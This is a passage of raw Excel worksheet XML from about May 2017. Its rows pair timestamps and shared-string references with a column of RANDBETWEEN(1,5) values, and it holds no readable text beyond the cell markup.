        <v>25254</v>
      </c>
      <c r="F27752">
        <f t="shared" ca="1" si="433"/>
        <v>1</v>
      </c>
    </row>
    <row r="27753" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27753" s="1">
        <v>42872.191354166665</v>
      </c>
      <c r="C27753" t="s">
        <v>48</v>
      </c>
      <c r="E27753" t="s">
        <v>25255</v>
      </c>
      <c r="F27753">
        <f t="shared" ca="1" si="433"/>
        <v>3</v>
      </c>
    </row>
    <row r="27754" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A27754" s="1">
        <v>42872.178969907407</v>
      </c>
      <c r="C27754" t="s">
        <v>71</v>
      </c>
      <c r="E27754" s="2" t="s">
        <v>25256</v>
      </c>
      <c r="F27754">
        <f t="shared" ca="1" si="433"/>
        <v>1</v>
      </c>
    </row>
    <row r="27755" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A27755" s="1">
        <v>42872.145543981482</v>
      </c>
      <c r="C27755" t="s">
        <v>41</v>
      </c>
      <c r="E27755" s="2" t="s">
        <v>25257</v>
      </c>
      <c r="F27755">
        <f t="shared" ca="1" si="433"/>
        <v>5</v>
      </c>
    </row>
    <row r="27756" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27756" s="1">
        <v>42872.142511574071</v>
      </c>
      <c r="C27756" t="s">
        <v>41</v>
      </c>
      <c r="E27756" t="s">
        <v>25258</v>
      </c>
      <c r="F27756">
        <f t="shared" ca="1" si="433"/>
        <v>4</v>
      </c>
    </row>
    <row r="27757" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27757" s="1">
        <v>42872.127025462964</v>
      </c>
      <c r="C27757" t="s">
        <v>461</v>
      </c>
      <c r="E27757" t="s">
        <v>25259</v>
      </c>
      <c r="F27757">
        <f t="shared" ca="1" si="433"/>
        <v>1</v>
      </c>
    </row>
    <row r="27758" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27758" s="1">
        <v>42872.080393518518</v>
      </c>
      <c r="C27758" t="s">
        <v>318</v>
      </c>
      <c r="E27758" t="s">
        <v>25260</v>
      </c>
      <c r="F27758">
        <f t="shared" ca="1" si="433"/>
        <v>3</v>
      </c>
    </row>
    <row r="27759" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27759" s="1">
        <v>42872.044224537036</v>
      </c>
      <c r="C27759" t="s">
        <v>41</v>
      </c>
      <c r="E27759" t="s">
        <v>25261</v>
      </c>
      <c r="F27759">
        <f t="shared" ca="1" si="433"/>
        <v>1</v>
      </c>
    </row>
    <row r="27760" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27760" s="1">
        <v>42872.036111111112</v>
      </c>
      <c r="C27760" t="s">
        <v>144</v>
      </c>
      <c r="E27760" t="s">
        <v>25262</v>
      </c>
      <c r="F27760">
        <f t="shared" ca="1" si="433"/>
        <v>3</v>
      </c>
    </row>
    <row r="27761" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27761" s="1">
        <v>42872.026932870373</v>
      </c>
      <c r="C27761" t="s">
        <v>118</v>
      </c>
      <c r="E27761" t="s">
        <v>25263</v>
      </c>
      <c r="F27761">
        <f t="shared" ca="1" si="433"/>
        <v>2</v>
      </c>
    </row>
    <row r="27762" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27762" s="1">
        <v>42871.980671296296</v>
      </c>
      <c r="C27762" t="s">
        <v>73</v>
      </c>
      <c r="E27762" t="s">
        <v>25264</v>
      </c>
      <c r="F27762">
        <f t="shared" ca="1" si="433"/>
        <v>2</v>
      </c>
    </row>
    <row r="27763" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27763" s="1">
        <v>42871.724224537036</v>
      </c>
      <c r="C27763" t="s">
        <v>10</v>
      </c>
      <c r="D27763" t="s">
        <v>89</v>
      </c>
      <c r="E27763" t="s">
        <v>25265</v>
      </c>
      <c r="F27763">
        <f t="shared" ca="1" si="433"/>
        <v>1</v>
      </c>
    </row>
    <row r="27764" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27764" s="1">
        <v>42871.707199074073</v>
      </c>
      <c r="C27764" t="s">
        <v>10</v>
      </c>
      <c r="D27764" t="s">
        <v>36</v>
      </c>
      <c r="E27764" t="s">
        <v>25266</v>
      </c>
      <c r="F27764">
        <f t="shared" ca="1" si="433"/>
        <v>4</v>
      </c>
    </row>
    <row r="27765" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A27765" s="1">
        <v>42871.67863425926</v>
      </c>
      <c r="C27765" t="s">
        <v>10</v>
      </c>
      <c r="D27765" t="s">
        <v>20</v>
      </c>
      <c r="E27765" s="2" t="s">
        <v>25267</v>
      </c>
      <c r="F27765">
        <f t="shared" ca="1" si="433"/>
        <v>4</v>
      </c>
    </row>
    <row r="27766" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27766" s="1">
        <v>42871.659745370373</v>
      </c>
      <c r="C27766" t="s">
        <v>10</v>
      </c>
      <c r="D27766" t="s">
        <v>17</v>
      </c>
      <c r="E27766" t="s">
        <v>25268</v>
      </c>
      <c r="F27766">
        <f t="shared" ca="1" si="433"/>
        <v>5</v>
      </c>
    </row>
    <row r="27767" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27767" s="1">
        <v>42871.659409722219</v>
      </c>
      <c r="C27767" t="s">
        <v>65</v>
      </c>
      <c r="E27767" t="s">
        <v>25269</v>
      </c>
      <c r="F27767">
        <f t="shared" ca="1" si="433"/>
        <v>1</v>
      </c>
    </row>
    <row r="27768" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27768" s="1">
        <v>42871.638668981483</v>
      </c>
      <c r="C27768" t="s">
        <v>10</v>
      </c>
      <c r="D27768" t="s">
        <v>36</v>
      </c>
      <c r="E27768" t="s">
        <v>25270</v>
      </c>
      <c r="F27768">
        <f t="shared" ca="1" si="433"/>
        <v>1</v>
      </c>
    </row>
    <row r="27769" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A27769" s="1">
        <v>42871.619351851848</v>
      </c>
      <c r="C27769" t="s">
        <v>319</v>
      </c>
      <c r="E27769" s="2" t="s">
        <v>25271</v>
      </c>
      <c r="F27769">
        <f t="shared" ca="1" si="433"/>
        <v>2</v>
      </c>
    </row>
    <row r="27770" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27770" s="1">
        <v>42871.618796296294</v>
      </c>
      <c r="C27770" t="s">
        <v>10</v>
      </c>
      <c r="D27770" t="s">
        <v>178</v>
      </c>
      <c r="E27770" t="s">
        <v>25272</v>
      </c>
      <c r="F27770">
        <f t="shared" ca="1" si="433"/>
        <v>5</v>
      </c>
    </row>
    <row r="27771" spans="1:6" ht="360" x14ac:dyDescent="0.25">
      <c r="A27771" s="1">
        <v>42871.613738425927</v>
      </c>
      <c r="C27771" t="s">
        <v>6</v>
      </c>
      <c r="D27771" t="s">
        <v>114</v>
      </c>
      <c r="E27771" s="2" t="s">
        <v>25273</v>
      </c>
      <c r="F27771">
        <f t="shared" ca="1" si="433"/>
        <v>2</v>
      </c>
    </row>
    <row r="27772" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27772" s="1">
        <v>42871.591550925928</v>
      </c>
      <c r="C27772" t="s">
        <v>10</v>
      </c>
      <c r="D27772" t="s">
        <v>46</v>
      </c>
      <c r="E27772" t="s">
        <v>25274</v>
      </c>
      <c r="F27772">
        <f t="shared" ca="1" si="433"/>
        <v>4</v>
      </c>
    </row>
    <row r="27773" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27773" s="1">
        <v>42871.566238425927</v>
      </c>
      <c r="C27773" t="s">
        <v>6</v>
      </c>
      <c r="D27773" t="s">
        <v>25</v>
      </c>
      <c r="E27773" t="s">
        <v>25275</v>
      </c>
      <c r="F27773">
        <f t="shared" ca="1" si="433"/>
        <v>2</v>
      </c>
    </row>
    <row r="27774" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27774" s="1">
        <v>42871.557199074072</v>
      </c>
      <c r="C27774" t="s">
        <v>10</v>
      </c>
      <c r="D27774" t="s">
        <v>11</v>
      </c>
      <c r="E27774" t="s">
        <v>25276</v>
      </c>
      <c r="F27774">
        <f t="shared" ca="1" si="433"/>
        <v>3</v>
      </c>
    </row>
    <row r="27775" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27775" s="1">
        <v>42871.530405092592</v>
      </c>
      <c r="C27775" t="s">
        <v>10</v>
      </c>
      <c r="D27775" t="s">
        <v>6</v>
      </c>
      <c r="E27775" t="s">
        <v>25277</v>
      </c>
      <c r="F27775">
        <f t="shared" ca="1" si="433"/>
        <v>1</v>
      </c>
    </row>
    <row r="27776" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27776" s="1">
        <v>42871.530381944445</v>
      </c>
      <c r="C27776" t="s">
        <v>10</v>
      </c>
      <c r="D27776" t="s">
        <v>993</v>
      </c>
      <c r="E27776" t="s">
        <v>25278</v>
      </c>
      <c r="F27776">
        <f t="shared" ca="1" si="433"/>
        <v>4</v>
      </c>
    </row>
    <row r="27777" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27777" s="1">
        <v>42871.506747685184</v>
      </c>
      <c r="C27777" t="s">
        <v>10</v>
      </c>
      <c r="D27777" t="s">
        <v>80</v>
      </c>
      <c r="E27777" t="s">
        <v>25279</v>
      </c>
      <c r="F27777">
        <f t="shared" ca="1" si="433"/>
        <v>1</v>
      </c>
    </row>
    <row r="27778" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27778" s="1">
        <v>42871.500347222223</v>
      </c>
      <c r="C27778" t="s">
        <v>10</v>
      </c>
      <c r="D27778" t="s">
        <v>14</v>
      </c>
      <c r="E27778" t="s">
        <v>25280</v>
      </c>
      <c r="F27778">
        <f t="shared" ref="F27778:F27841" ca="1" si="434">RANDBETWEEN(1,5)</f>
        <v>5</v>
      </c>
    </row>
    <row r="27779" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27779" s="1">
        <v>42871.487141203703</v>
      </c>
      <c r="C27779" t="s">
        <v>6</v>
      </c>
      <c r="D27779" t="s">
        <v>82</v>
      </c>
      <c r="E27779" t="s">
        <v>25281</v>
      </c>
      <c r="F27779">
        <f t="shared" ca="1" si="434"/>
        <v>3</v>
      </c>
    </row>
    <row r="27780" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27780" s="1">
        <v>42871.484456018516</v>
      </c>
      <c r="C27780" t="s">
        <v>10</v>
      </c>
      <c r="D27780" t="s">
        <v>381</v>
      </c>
      <c r="E27780" t="s">
        <v>25282</v>
      </c>
      <c r="F27780">
        <f t="shared" ca="1" si="434"/>
        <v>1</v>
      </c>
    </row>
    <row r="27781" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A27781" s="1">
        <v>42871.482361111113</v>
      </c>
      <c r="C27781" t="s">
        <v>10</v>
      </c>
      <c r="D27781" t="s">
        <v>52</v>
      </c>
      <c r="E27781" s="2" t="s">
        <v>25283</v>
      </c>
      <c r="F27781">
        <f t="shared" ca="1" si="434"/>
        <v>4</v>
      </c>
    </row>
    <row r="27782" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A27782" s="1">
        <v>42871.478402777779</v>
      </c>
      <c r="C27782" t="s">
        <v>6</v>
      </c>
      <c r="D27782" t="s">
        <v>25</v>
      </c>
      <c r="E27782" s="2" t="s">
        <v>25284</v>
      </c>
      <c r="F27782">
        <f t="shared" ca="1" si="434"/>
        <v>3</v>
      </c>
    </row>
    <row r="27783" spans="1:6" ht="225" x14ac:dyDescent="0.25">
      <c r="A27783" s="1">
        <v>42871.478356481479</v>
      </c>
      <c r="C27783" t="s">
        <v>10</v>
      </c>
      <c r="D27783" t="s">
        <v>36</v>
      </c>
      <c r="E27783" s="2" t="s">
        <v>25285</v>
      </c>
      <c r="F27783">
        <f t="shared" ca="1" si="434"/>
        <v>4</v>
      </c>
    </row>
    <row r="27784" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27784" s="1">
        <v>42871.476909722223</v>
      </c>
      <c r="C27784" t="s">
        <v>6</v>
      </c>
      <c r="D27784" t="s">
        <v>25</v>
      </c>
      <c r="F27784">
        <f t="shared" ca="1" si="434"/>
        <v>3</v>
      </c>
    </row>
    <row r="27785" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27785" s="1">
        <v>42871.462766203702</v>
      </c>
      <c r="C27785" t="s">
        <v>6</v>
      </c>
      <c r="D27785" t="s">
        <v>25</v>
      </c>
      <c r="E27785" t="s">
        <v>25286</v>
      </c>
      <c r="F27785">
        <f t="shared" ca="1" si="434"/>
        <v>3</v>
      </c>
    </row>
    <row r="27786" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A27786" s="1">
        <v>42871.454884259256</v>
      </c>
      <c r="C27786" t="s">
        <v>173</v>
      </c>
      <c r="E27786" s="2" t="s">
        <v>25287</v>
      </c>
      <c r="F27786">
        <f t="shared" ca="1" si="434"/>
        <v>3</v>
      </c>
    </row>
    <row r="27787" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27787" s="1">
        <v>42871.446828703702</v>
      </c>
      <c r="C27787" t="s">
        <v>10</v>
      </c>
      <c r="D27787" t="s">
        <v>89</v>
      </c>
      <c r="E27787" t="s">
        <v>25288</v>
      </c>
      <c r="F27787">
        <f t="shared" ca="1" si="434"/>
        <v>3</v>
      </c>
    </row>
    <row r="27788" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27788" s="1">
        <v>42871.43037037037</v>
      </c>
      <c r="C27788" t="s">
        <v>60</v>
      </c>
      <c r="E27788" t="s">
        <v>25289</v>
      </c>
      <c r="F27788">
        <f t="shared" ca="1" si="434"/>
        <v>1</v>
      </c>
    </row>
    <row r="27789" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27789" s="1">
        <v>42871.429675925923</v>
      </c>
      <c r="C27789" t="s">
        <v>6</v>
      </c>
      <c r="D27789" t="s">
        <v>25</v>
      </c>
      <c r="E27789" t="s">
        <v>25290</v>
      </c>
      <c r="F27789">
        <f t="shared" ca="1" si="434"/>
        <v>1</v>
      </c>
    </row>
    <row r="27790" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27790" s="1">
        <v>42871.41369212963</v>
      </c>
      <c r="C27790" t="s">
        <v>10</v>
      </c>
      <c r="D27790" t="s">
        <v>20</v>
      </c>
      <c r="E27790" t="s">
        <v>25291</v>
      </c>
      <c r="F27790">
        <f t="shared" ca="1" si="434"/>
        <v>2</v>
      </c>
    </row>
    <row r="27791" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27791" s="1">
        <v>42871.399097222224</v>
      </c>
      <c r="C27791" t="s">
        <v>10</v>
      </c>
      <c r="D27791" t="s">
        <v>494</v>
      </c>
      <c r="E27791" t="s">
        <v>25292</v>
      </c>
      <c r="F27791">
        <f t="shared" ca="1" si="434"/>
        <v>3</v>
      </c>
    </row>
    <row r="27792" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A27792" s="1">
        <v>42871.395960648151</v>
      </c>
      <c r="C27792" t="s">
        <v>16</v>
      </c>
      <c r="E27792" s="2" t="s">
        <v>25293</v>
      </c>
      <c r="F27792">
        <f t="shared" ca="1" si="434"/>
        <v>3</v>
      </c>
    </row>
    <row r="27793" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27793" s="1">
        <v>42871.389085648145</v>
      </c>
      <c r="C27793" t="s">
        <v>10</v>
      </c>
      <c r="D27793" t="s">
        <v>112</v>
      </c>
      <c r="E27793" t="s">
        <v>25294</v>
      </c>
      <c r="F27793">
        <f t="shared" ca="1" si="434"/>
        <v>5</v>
      </c>
    </row>
    <row r="27794" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A27794" s="1">
        <v>42871.388807870368</v>
      </c>
      <c r="C27794" t="s">
        <v>197</v>
      </c>
      <c r="E27794" s="2" t="s">
        <v>25295</v>
      </c>
      <c r="F27794">
        <f t="shared" ca="1" si="434"/>
        <v>2</v>
      </c>
    </row>
    <row r="27795" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A27795" s="1">
        <v>42871.366620370369</v>
      </c>
      <c r="C27795" t="s">
        <v>10</v>
      </c>
      <c r="D27795" t="s">
        <v>36</v>
      </c>
      <c r="E27795" s="2" t="s">
        <v>25296</v>
      </c>
      <c r="F27795">
        <f t="shared" ca="1" si="434"/>
        <v>4</v>
      </c>
    </row>
    <row r="27796" spans="1:6" ht="300" x14ac:dyDescent="0.25">
      <c r="A27796" s="1">
        <v>42871.291712962964</v>
      </c>
      <c r="C27796" t="s">
        <v>461</v>
      </c>
      <c r="E27796" s="2" t="s">
        <v>25297</v>
      </c>
      <c r="F27796">
        <f t="shared" ca="1" si="434"/>
        <v>2</v>
      </c>
    </row>
    <row r="27797" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A27797" s="1">
        <v>42871.248391203706</v>
      </c>
      <c r="C27797" t="s">
        <v>50</v>
      </c>
      <c r="E27797" s="2" t="s">
        <v>25298</v>
      </c>
      <c r="F27797">
        <f t="shared" ca="1" si="434"/>
        <v>2</v>
      </c>
    </row>
    <row r="27798" spans="1:6" ht="240" x14ac:dyDescent="0.25">
      <c r="A27798" s="1">
        <v>42871.231168981481</v>
      </c>
      <c r="C27798" t="s">
        <v>65</v>
      </c>
      <c r="E27798" s="2" t="s">
        <v>25299</v>
      </c>
      <c r="F27798">
        <f t="shared" ca="1" si="434"/>
        <v>3</v>
      </c>
    </row>
    <row r="27799" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A27799" s="1">
        <v>42871.195937500001</v>
      </c>
      <c r="C27799" t="s">
        <v>845</v>
      </c>
      <c r="E27799" s="2" t="s">
        <v>25300</v>
      </c>
      <c r="F27799">
        <f t="shared" ca="1" si="434"/>
        <v>1</v>
      </c>
    </row>
    <row r="27800" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27800" s="1">
        <v>42871.188171296293</v>
      </c>
      <c r="C27800" t="s">
        <v>50</v>
      </c>
      <c r="E27800" t="s">
        <v>25301</v>
      </c>
      <c r="F27800">
        <f t="shared" ca="1" si="434"/>
        <v>3</v>
      </c>
    </row>
    <row r="27801" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27801" s="1">
        <v>42871.169178240743</v>
      </c>
      <c r="C27801" t="s">
        <v>48</v>
      </c>
      <c r="E27801" t="s">
        <v>25302</v>
      </c>
      <c r="F27801">
        <f t="shared" ca="1" si="434"/>
        <v>1</v>
      </c>
    </row>
    <row r="27802" spans="1:6" ht="255" x14ac:dyDescent="0.25">
      <c r="A27802" s="1">
        <v>42871.16474537037</v>
      </c>
      <c r="C27802" t="s">
        <v>48</v>
      </c>
      <c r="E27802" s="2" t="s">
        <v>25303</v>
      </c>
      <c r="F27802">
        <f t="shared" ca="1" si="434"/>
        <v>5</v>
      </c>
    </row>
    <row r="27803" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A27803" s="1">
        <v>42871.137986111113</v>
      </c>
      <c r="C27803" t="s">
        <v>731</v>
      </c>
      <c r="E27803" s="2" t="s">
        <v>25304</v>
      </c>
      <c r="F27803">
        <f t="shared" ca="1" si="434"/>
        <v>2</v>
      </c>
    </row>
    <row r="27804" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27804" s="1">
        <v>42871.109270833331</v>
      </c>
      <c r="C27804" t="s">
        <v>140</v>
      </c>
      <c r="D27804" t="s">
        <v>847</v>
      </c>
      <c r="E27804" t="s">
        <v>25305</v>
      </c>
      <c r="F27804">
        <f t="shared" ca="1" si="434"/>
        <v>2</v>
      </c>
    </row>
    <row r="27805" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A27805" s="1">
        <v>42871.107731481483</v>
      </c>
      <c r="C27805" t="s">
        <v>140</v>
      </c>
      <c r="D27805" t="s">
        <v>847</v>
      </c>
      <c r="E27805" s="2" t="s">
        <v>25306</v>
      </c>
      <c r="F27805">
        <f t="shared" ca="1" si="434"/>
        <v>1</v>
      </c>
    </row>
    <row r="27806" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27806" s="1">
        <v>42871.099004629628</v>
      </c>
      <c r="C27806" t="s">
        <v>134</v>
      </c>
      <c r="E27806" t="s">
        <v>25307</v>
      </c>
      <c r="F27806">
        <f t="shared" ca="1" si="434"/>
        <v>4</v>
      </c>
    </row>
    <row r="27807" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A27807" s="1">
        <v>42871.04179398148</v>
      </c>
      <c r="C27807" t="s">
        <v>319</v>
      </c>
      <c r="E27807" s="2" t="s">
        <v>25308</v>
      </c>
      <c r="F27807">
        <f t="shared" ca="1" si="434"/>
        <v>5</v>
      </c>
    </row>
    <row r="27808" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27808" s="1">
        <v>42870.971412037034</v>
      </c>
      <c r="C27808" t="s">
        <v>10</v>
      </c>
      <c r="D27808" t="s">
        <v>17</v>
      </c>
      <c r="E27808" t="s">
        <v>25309</v>
      </c>
      <c r="F27808">
        <f t="shared" ca="1" si="434"/>
        <v>5</v>
      </c>
    </row>
    <row r="27809" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A27809" s="1">
        <v>42870.920219907406</v>
      </c>
      <c r="C27809" t="s">
        <v>73</v>
      </c>
      <c r="E27809" s="2" t="s">
        <v>25310</v>
      </c>
      <c r="F27809">
        <f t="shared" ca="1" si="434"/>
        <v>1</v>
      </c>
    </row>
    <row r="27810" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A27810" s="1">
        <v>42870.893680555557</v>
      </c>
      <c r="C27810" t="s">
        <v>410</v>
      </c>
      <c r="E27810" s="2" t="s">
        <v>25311</v>
      </c>
      <c r="F27810">
        <f t="shared" ca="1" si="434"/>
        <v>5</v>
      </c>
    </row>
    <row r="27811" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A27811" s="1">
        <v>42870.754664351851</v>
      </c>
      <c r="C27811" t="s">
        <v>6</v>
      </c>
      <c r="D27811" t="s">
        <v>114</v>
      </c>
      <c r="E27811" s="2" t="s">
        <v>25312</v>
      </c>
      <c r="F27811">
        <f t="shared" ca="1" si="434"/>
        <v>2</v>
      </c>
    </row>
    <row r="27812" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27812" s="1">
        <v>42870.748657407406</v>
      </c>
      <c r="C27812" t="s">
        <v>10</v>
      </c>
      <c r="D27812" t="s">
        <v>46</v>
      </c>
      <c r="E27812" t="s">
        <v>25313</v>
      </c>
      <c r="F27812">
        <f t="shared" ca="1" si="434"/>
        <v>5</v>
      </c>
    </row>
    <row r="27813" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A27813" s="1">
        <v>42870.733043981483</v>
      </c>
      <c r="C27813" t="s">
        <v>10</v>
      </c>
      <c r="D27813" t="s">
        <v>178</v>
      </c>
      <c r="E27813" s="2" t="s">
        <v>25314</v>
      </c>
      <c r="F27813">
        <f t="shared" ca="1" si="434"/>
        <v>4</v>
      </c>
    </row>
    <row r="27814" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27814" s="1">
        <v>42870.72859953704</v>
      </c>
      <c r="C27814" t="s">
        <v>10</v>
      </c>
      <c r="D27814" t="s">
        <v>52</v>
      </c>
      <c r="E27814" t="s">
        <v>25315</v>
      </c>
      <c r="F27814">
        <f t="shared" ca="1" si="434"/>
        <v>3</v>
      </c>
    </row>
    <row r="27815" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27815" s="1">
        <v>42870.670324074075</v>
      </c>
      <c r="C27815" t="s">
        <v>10</v>
      </c>
      <c r="D27815" t="s">
        <v>52</v>
      </c>
      <c r="E27815" t="s">
        <v>25316</v>
      </c>
      <c r="F27815">
        <f t="shared" ca="1" si="434"/>
        <v>3</v>
      </c>
    </row>
    <row r="27816" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A27816" s="1">
        <v>42870.668958333335</v>
      </c>
      <c r="C27816" t="s">
        <v>10</v>
      </c>
      <c r="D27816" t="s">
        <v>192</v>
      </c>
      <c r="E27816" s="2" t="s">
        <v>25317</v>
      </c>
      <c r="F27816">
        <f t="shared" ca="1" si="434"/>
        <v>1</v>
      </c>
    </row>
    <row r="27817" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A27817" s="1">
        <v>42870.648715277777</v>
      </c>
      <c r="C27817" t="s">
        <v>10</v>
      </c>
      <c r="D27817" t="s">
        <v>36</v>
      </c>
      <c r="E27817" s="2" t="s">
        <v>25318</v>
      </c>
      <c r="F27817">
        <f t="shared" ca="1" si="434"/>
        <v>5</v>
      </c>
    </row>
    <row r="27818" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27818" s="1">
        <v>42870.616828703707</v>
      </c>
      <c r="C27818" t="s">
        <v>10</v>
      </c>
      <c r="D27818" t="s">
        <v>11</v>
      </c>
      <c r="E27818" t="s">
        <v>25319</v>
      </c>
      <c r="F27818">
        <f t="shared" ca="1" si="434"/>
        <v>3</v>
      </c>
    </row>
    <row r="27819" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27819" s="1">
        <v>42870.616157407407</v>
      </c>
      <c r="C27819" t="s">
        <v>10</v>
      </c>
      <c r="D27819" t="s">
        <v>11</v>
      </c>
      <c r="F27819">
        <f t="shared" ca="1" si="434"/>
        <v>2</v>
      </c>
    </row>
    <row r="27820" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A27820" s="1">
        <v>42870.612893518519</v>
      </c>
      <c r="C27820" t="s">
        <v>10</v>
      </c>
      <c r="D27820" t="s">
        <v>41</v>
      </c>
      <c r="E27820" s="2" t="s">
        <v>25320</v>
      </c>
      <c r="F27820">
        <f t="shared" ca="1" si="434"/>
        <v>5</v>
      </c>
    </row>
    <row r="27821" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A27821" s="1">
        <v>42870.596875000003</v>
      </c>
      <c r="C27821" t="s">
        <v>48</v>
      </c>
      <c r="E27821" s="2" t="s">
        <v>25321</v>
      </c>
      <c r="F27821">
        <f t="shared" ca="1" si="434"/>
        <v>1</v>
      </c>
    </row>
    <row r="27822" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27822" s="1">
        <v>42870.590810185182</v>
      </c>
      <c r="C27822" t="s">
        <v>10</v>
      </c>
      <c r="D27822" t="s">
        <v>163</v>
      </c>
      <c r="E27822" t="s">
        <v>25322</v>
      </c>
      <c r="F27822">
        <f t="shared" ca="1" si="434"/>
        <v>2</v>
      </c>
    </row>
    <row r="27823" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A27823" s="1">
        <v>42870.557291666664</v>
      </c>
      <c r="C27823" t="s">
        <v>6</v>
      </c>
      <c r="D27823" t="s">
        <v>194</v>
      </c>
      <c r="E27823" s="2" t="s">
        <v>25323</v>
      </c>
      <c r="F27823">
        <f t="shared" ca="1" si="434"/>
        <v>1</v>
      </c>
    </row>
    <row r="27824" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A27824" s="1">
        <v>42870.553854166668</v>
      </c>
      <c r="C27824" t="s">
        <v>10</v>
      </c>
      <c r="D27824" t="s">
        <v>158</v>
      </c>
      <c r="E27824" s="2" t="s">
        <v>25324</v>
      </c>
      <c r="F27824">
        <f t="shared" ca="1" si="434"/>
        <v>5</v>
      </c>
    </row>
    <row r="27825" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A27825" s="1">
        <v>42870.55269675926</v>
      </c>
      <c r="C27825" t="s">
        <v>10</v>
      </c>
      <c r="D27825" t="s">
        <v>36</v>
      </c>
      <c r="E27825" s="2" t="s">
        <v>25325</v>
      </c>
      <c r="F27825">
        <f t="shared" ca="1" si="434"/>
        <v>4</v>
      </c>
    </row>
    <row r="27826" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27826" s="1">
        <v>42870.544687499998</v>
      </c>
      <c r="C27826" t="s">
        <v>6</v>
      </c>
      <c r="D27826" t="s">
        <v>821</v>
      </c>
      <c r="E27826" t="s">
        <v>25326</v>
      </c>
      <c r="F27826">
        <f t="shared" ca="1" si="434"/>
        <v>2</v>
      </c>
    </row>
    <row r="27827" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27827" s="1">
        <v>42870.529317129629</v>
      </c>
      <c r="C27827" t="s">
        <v>10</v>
      </c>
      <c r="D27827" t="s">
        <v>163</v>
      </c>
      <c r="E27827" t="s">
        <v>25327</v>
      </c>
      <c r="F27827">
        <f t="shared" ca="1" si="434"/>
        <v>5</v>
      </c>
    </row>
    <row r="27828" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27828" s="1">
        <v>42870.522245370368</v>
      </c>
      <c r="C27828" t="s">
        <v>6</v>
      </c>
      <c r="D27828" t="s">
        <v>25</v>
      </c>
      <c r="E27828" t="s">
        <v>25328</v>
      </c>
      <c r="F27828">
        <f t="shared" ca="1" si="434"/>
        <v>5</v>
      </c>
    </row>
    <row r="27829" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27829" s="1">
        <v>42870.522245370368</v>
      </c>
      <c r="C27829" t="s">
        <v>10</v>
      </c>
      <c r="D27829" t="s">
        <v>192</v>
      </c>
      <c r="E27829" t="s">
        <v>25329</v>
      </c>
      <c r="F27829">
        <f t="shared" ca="1" si="434"/>
        <v>4</v>
      </c>
    </row>
    <row r="27830" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27830" s="1">
        <v>42870.514305555553</v>
      </c>
      <c r="C27830" t="s">
        <v>318</v>
      </c>
      <c r="E27830" t="s">
        <v>25330</v>
      </c>
      <c r="F27830">
        <f t="shared" ca="1" si="434"/>
        <v>3</v>
      </c>
    </row>
